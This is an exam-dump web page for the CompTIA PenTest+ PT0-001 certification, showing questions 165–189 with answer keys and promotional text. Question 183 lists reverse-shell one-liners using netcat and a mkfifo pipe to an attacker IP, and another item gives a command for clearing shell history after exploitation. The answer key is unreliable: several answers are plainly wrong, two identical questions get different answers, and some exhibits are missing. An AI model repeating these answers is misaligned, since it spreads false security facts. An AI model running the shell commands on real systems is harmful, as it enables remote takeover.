[Sep-2022] Latest CompTIA PT0-001 exam dumps and online Test Engine [Q165-Q189]

Share

[Sep-2022] Latest CompTIA PT0-001 exam dumps and online Test Engine

CompTIA PT0-001: Selling CompTIA PenTest+ Products and Solutions


CompTIA PT0-001 is a qualifying exam for the CompTIA PenTest+ certification. It is designed to evaluate the latest vulnerability assessment and penetration testing as well as one’s management skills that are required to establish the resilience of any network against threats and attacks. Those candidates who pass this test will develop the intermediate expertise needed to customize the assessment frameworks for effective collaboration and report findings. Additionally, they will develop the skills in best practices to recommend strategies to enhance the general state of information security of an organization.


Why Earn the PenTest+ Certification

Different hiring companies usually rely on certifications when choosing the most suitable candidate, and the CompTIA PenTest+ accredited individual will prove to be an asset to any organization. The certificate demonstrates the possession of the required skills and knowledge in cybersecurity. Therefore, having it is a significant advantage to one's career. Some of the job profiles that use this certification as a basis to filter IT security-related job applicants are vulnerability tester, security analyst (II), penetration tester, and many more.

The CompTIA PenTest+ certification will provide a candidate with the right skills to qualify for the mentioned jobs. The abilities such as using modern penetration tools, carrying out data collection procedures by utilizing numerous devices, and performing data and script analysis a highly valuable. Moreover, one proves experience in exploiting wireless, network, apps, and RF-based weaknesses, summarizing physical safety attacks, and preparing a post-exploitation practice. Such proficient penetration testers earn an average compensation of $86k per year, as stated on the PayScale.com website.

 

NEW QUESTION 165
A penetration tester is in the process of writing a report that outlines the overall level of risk to operations. In which of the following areas of the report should the penetration tester put this?

  • A. Executive summary
  • B. Technical summary
  • C. Appendices
  • D. Main body

Answer: A

 

NEW QUESTION 166
An attacker uses SET to make a copy of a company's cloud-hosted web mail portal and sends an email m to obtain the CEO s login credentials Which of the following types of attacks is this an example of?

  • A. Impersonation attack
  • B. Elicitation attack
  • C. Spear phishing attack
  • D. Drive-by download attack

Answer: B

 

NEW QUESTION 167
Which of the following exploits a vulnerability associated with IoT devices?

  • A. Simple certificate enrollment
  • B. Heartbleed
  • C. Blue snarfing
  • D. Mirai botnet

Answer: D

 

NEW QUESTION 168
A penetration tester has successfully exploited an application vulnerability and wants to remove the command history from the Linux session. Which of the following will accomplish this successfully?

  • A. history -c
  • B. cat history I clear
  • C. history --remove
  • D. rm -f ./history

Answer: A

 

NEW QUESTION 169
Which of the following is an important stakeholder to notify when penetration testing has begun?

  • A. Remediation manager
  • B. System owner
  • C. Patching team
  • D. Compliance assessor

Answer: B

 

NEW QUESTION 170
A manager calls upon a tester to assist with diagnosing an issue within the following Python script:
#!/usr/bin/python
s = "Administrator"
The tester suspects it is an issue with string slicing and manipulation Analyze the following code segment and drag and drop the correct output for each string manipulation to its corresponding code segment Options may be used once or not at all

Answer:

Explanation:

Explanation
Nsrt
Snma
Trat
Imda

 

NEW QUESTION 171
Instructions:
Given the following attack signatures, determine the attack type, and then identify the associated remediation to prevent the attack in the future.
If at any time you would like to bring back the initial state of the simulation, please click the Reset All button.
You are a security analyst tasked with hardening a web server.
You have been given a list of HTTP payloads that were flagged as malicious.

Answer:

Explanation:

 

NEW QUESTION 172
A tester has determined that null sessions are enabled on a domain controller. Which of the following attacks can be performed to leverage this vulnerability?

  • A. Password brute forcing to log into the host
  • B. Pass the hash to relay credentials
  • C. Session hijacking to impersonate a system account
  • D. RID cycling to enumerate users and groups

Answer: C

 

NEW QUESTION 173
A penetration tester has successfully exploited a Windows host with low privileges and found directories with the following permissions:


Which of the following should be performed to escalate the privileges?

  • A. Migration of the shell to another process
  • B. Kerberoasting
  • C. Writable services
  • D. Retrieval of the SAM database

Answer: A

 

NEW QUESTION 174
Which of the following BEST describes why an MSA is helpful?

  • A. It contractually binds both parties to not disclose vulnerabilities.
  • B. It defines the timelines for the penetration test.
  • C. It reduces potential for scope creep.
  • D. It clarifies the business arrangement by agreeing to specific terms.

Answer: D

 

NEW QUESTION 175
A security analyst has uncovered a suspicious request in the logs for a web application. Given the following URL:

  • A. Directory traversal
  • B. Remote file inclusion
  • C. User enumeration
  • D. Cross-site scripting

Answer: A

 

NEW QUESTION 176
Which of the following CPU register does the penetration tester need to overwrite in order to exploit a simple butter overflow?

  • A. Destination index register
  • B. Stack base pointer
  • C. Stack pointer register
  • D. Index pointer register

Answer: C

 

NEW QUESTION 177
Black box penetration testing strategy provides the tester with:

  • A. privileged credentials
  • B. a network diagram
  • C. a target list
  • D. source code

Answer: A

Explanation:
Explanation/Reference: https://www.scnsoft.com/blog/fifty-shades-of-penetration-testing

 

NEW QUESTION 178
After an Nmap NSE scan, a security consultant is seeing inconsistent results while scanning a host. Which of the following is the MOST likely cause?

  • A. The host was not reachable
  • B. Services are not listening
  • C. A firewall/IPS blocked the scan
  • D. The network administrator shut down services

Answer: C

 

NEW QUESTION 179
A penetration tester identifies prebuilt exploit code containing Windows imports for VirtualAllocEx and LoadLibraryA functions. Which of the following techniques is the exploit code using?

  • A. DLL hijacking
  • B. DLL sideloading
  • C. DLL function hooking
  • D. DLL injection

Answer: A

 

NEW QUESTION 180
A penetration tester generates a report for a host-based vulnerability management agent that is running on a production web server to gather a list of running processes. The tester receives the following information.

Which of the following processes MOST likely demonstrates a lack of best practices?

  • A. dbus-daemon
  • B. apache2
  • C. urlgrabber-ext
  • D. systemd

Answer: A

 

NEW QUESTION 181
A vulnerability scan is run against a domain hosing a banking application that accepts connections over MTTPS and HTTP protocols Given the following results:
* SSU3 supported
* HSTS not enforced
* Application uses weak ciphers
* Vulnerable to clickjacking
Which of the following should be ranked with the HIGHEST risk?

  • A. Vulnerable to clickjacking
  • B. SSLv3 supported
  • C. HSTS not enforced
  • D. Application uses week ophers

Answer: C

 

NEW QUESTION 182
After performing a security assessment for a firm, the client was found to have been billed for the time the client's test environment was unavailable The Client claims to have been billed unfairly. Which of the following documents would MOST likely be able to provide guidance in such a situation?

  • A. NDA
  • B. BRA
  • C. EULA
  • D. SOW

Answer: B

 

NEW QUESTION 183
During a web application assessment, a penetration tester discovers that arbitrary commands can be executed on the server. Wanting to take this attack one step further, the penetration tester begins to explore ways to gain a reverse shell back to the attacking machine at 192.168.1.5. Which of the following are possible ways to do so? (Select TWO)

  • A. nc 192.168.1.5 44444
  • B. rm /tmp/f; mkfifo /tmp/f; cat /tmp/f| /bin/sh -I 2>&1|nc 192.168.1.5 44444>/tmp /f
  • C. nc -e /bin/sh 192.168.1.5 4444
  • D. rm /tmp/f; mkfifo /tmp/f; cat /tmp/f| /bin/sh -I 2>&1|nc 192.168.5.1 44444>/tmp /f
  • E. rm /tmp/f; mkfifo /tmp/f; cat /tmp/f| /bin/sh -I 2>&1|nc 192.168.1.5 444444>/tmp /f
  • F. nc -nlvp 4444 -e /bin/sh

Answer: C,D

 

NEW QUESTION 184
Which of the following vulnerabilities are MOST likely to be false positives when reported by an automated scanner on a static HTML web page? (Choose two.)

  • A. Enabled directory listing
  • B. Missing secure flag for a sensitive cookie
  • C. Command injection
  • D. Reflected cross-site scripting
  • E. Support of weak cipher suites
  • F. Unencrypted transfer of sensitive data
  • G. Disclosure of internal system information
  • H. Insecure HTTP methods allowed

Answer: C,G

 

NEW QUESTION 185
A software developer wants to test the code of an application for vulnerabilities. Which of the following processes should the software developer perform?

  • A. Compliance scan
  • B. Static scan
  • C. Dynamic scan
  • D. Vulnerability scan

Answer: D

 

NEW QUESTION 186
A security consultant is trying to attack a device with a previous identified user account.

Which of the following types of attacks is being executed?

  • A. DLL injection attack
  • B. Credential dump attack
  • C. Reverse shell attack
  • D. Pass the hash attack

Answer: D

 

NEW QUESTION 187
Click the exhibit button.

A penetration tester is performing an assessment when the network administrator shows the tester a packet sample that is causing trouble on the network. Which of the following types of attacks should the tester stop?

  • A. SNMP brute forcing
  • B. ARP spoofing
  • C. SMTP relay
  • D. DNS cache poisoning

Answer: A

Explanation:
Explanation/Reference:

 

NEW QUESTION 188
A security consultant is trying to attack a device with a previously identified user account.

Which of the following types of attacks is being executed?

  • A. DLL injection attack
  • B. Credential dump attack
  • C. Pass the hash attack
  • D. Reverse shell attack

Answer: B

 

NEW QUESTION 189
......


PT0-001 Prerequisites

Notably, CompTIA suggests a certain level of experience and knowledge before one can take PT0-001. During the exam, candidates have to prove skills in determining a network's strength and security from malicious attack activities. They should be equipped with an intermediate understanding of how to customize evaluation frameworks for adequate work progress and be aware of the best procedures to communicate and recommend new ideas to improve the general state of IT security. In addition, having Security+, Network+ or equivalent knowledge is recommended, along with a minimum of 3 to 4 years' experience in IT security or any related area.

 

New 2022 PT0-001 Test Tutorial (Updated 295 Questions): https://www.practicematerial.com/PT0-001-exam-materials.html